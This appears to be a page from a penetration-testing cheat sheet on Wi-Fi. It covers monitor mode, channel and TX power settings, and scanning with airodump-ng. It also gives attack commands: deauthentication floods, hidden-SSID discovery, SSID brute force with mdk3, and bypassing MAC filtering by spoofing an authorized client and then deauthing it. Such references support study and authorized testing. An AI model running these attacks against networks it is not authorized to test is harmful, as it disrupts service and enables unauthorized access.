đź“– CyberBook

Appearance

🛜 WIFI ​

📚 Resources ​

🛠️ Tools ​

Terminologies fundamentals ​

Details
TermDefinition
SSIDService Set Identifier. The Wi-Fi network name visible to users.
BSSIDBasic Service Set Identifier. The MAC address of the access point.
ESSIDExtended Service Set Identifier. Usually identical to SSID; used for extended networks (roaming).
BeaconManagement frame sent periodically by the AP to announce its presence (SSID, BSSID, channel, security).
IVInitialization Vector. Sent in cleartext with each encrypted packet. Combined with the key to generate the keystream. Essential for WEP attacks.

Interface Management ​

Check State ​

bash
iwconfig  # Show interfaces and status
iw list   # Show driver capabilities

Interface Configuration ​

bash
# Bring interface up/down
ip link set wlan0 up
ip link set wlan0 down

# Delete a virtual monitor interface
iw dev wlan0mon del

# Create a monitor interface manually
iw dev wlan0 interface add mon0 type monitor
bash
airmon-ng                 # List interfaces and chipsets
airmon-ng check           # Show interfering processes
airmon-ng check kill      # Kill NetworkManager, wpa_supplicant, etc.

airmon-ng start wlan0     # Create wlan0mon (monitor mode)
airmon-ng start wlan0 6   # Start on specific channel
airmon-ng stop wlan0mon   # Stop monitor mode
bash
# Test Injection
aireplay-ng -9 wlan0mon

⚡ TX Power ​

bash
# View current region and TX power limits
iw reg get

# Change region
iw reg set US

# Set TX power (interface must be down)
iwconfig wlan0 txpower 30

Scan ​

bash
iwlist wlan0 scan | grep -E 'Cell|Quality|ESSID|IEEE'

Channel & Frequency ​

bash
# List available channels
iwlist wlan0 channel

# Set channel (interface must be down)
iw dev wlan0mon set channel 6
iwconfig wlan0mon channel 11

# Set frequency
iwconfig wlan0 freq "5.52G"

# Show current frequency
iwlist wlan0 frequency | grep Current

airodump-ng ​

bash
airodump-ng $interface            # Start capture
airodump-ng -c 6,11 $interface    # channel 6 and 11
airodump-ng --band a              # a: 5GHz
airodump-ng --band bg             # b: 2,4GHz (11 Mbps) | g: 2,4GHz (54 Mbps)
airodump-ng -w capture $interface # Save to file

Hidden SSID Discovery ​

When ESSID = <length: 0> in airodump-ng, the SSID is hidden.

  • Passive method - wait for a client to connect:
bash
airodump-ng $interface -c $channel --bssid $bssid -w capture
  • Active method - Deauth attack, force a client to reconnect:
bash
aireplay-ng -0 2 -a $bssid -c $client_mac $interface

Brute-force SSID ​

bash
# Full brute-force (short SSIDs only)
mdk3 $interface p -b u -c 1 -t $bssid

# Wordlist attack
mdk3 $interface p -f /opt/wordlist.txt -t $bssid

# Character sets: u (uppercase), n (digits), a (all), c (mixed case), m (mixed+numbers)

MAC Filtering Bypass ​

  1. Identify an authorized client MAC from airodump-ng (STATION column)
  2. Spoof your MAC
bash
# show current mac addr
macchanger $interface

# (Interface must be down)
macchanger -m $authorized_mac $interface
  1. Deauth the legitimate client
bash
aireplay-ng -0 1 -a $bssid -c $authorized_mac $interface

Aircrack-ng Suite ​

bash
# Deauthentication (transverse attack)
aireplay-ng -0 <packets> -a $bssid -c $client_mac $interface
bash
# Generate graph from airodump-ng CSV
airgraph-ng -i capture-01.csv -g CAPR -o out.png

# Graph types:
# - CAPR: Client-to-AP relationship
# - CPG: Client-to-client association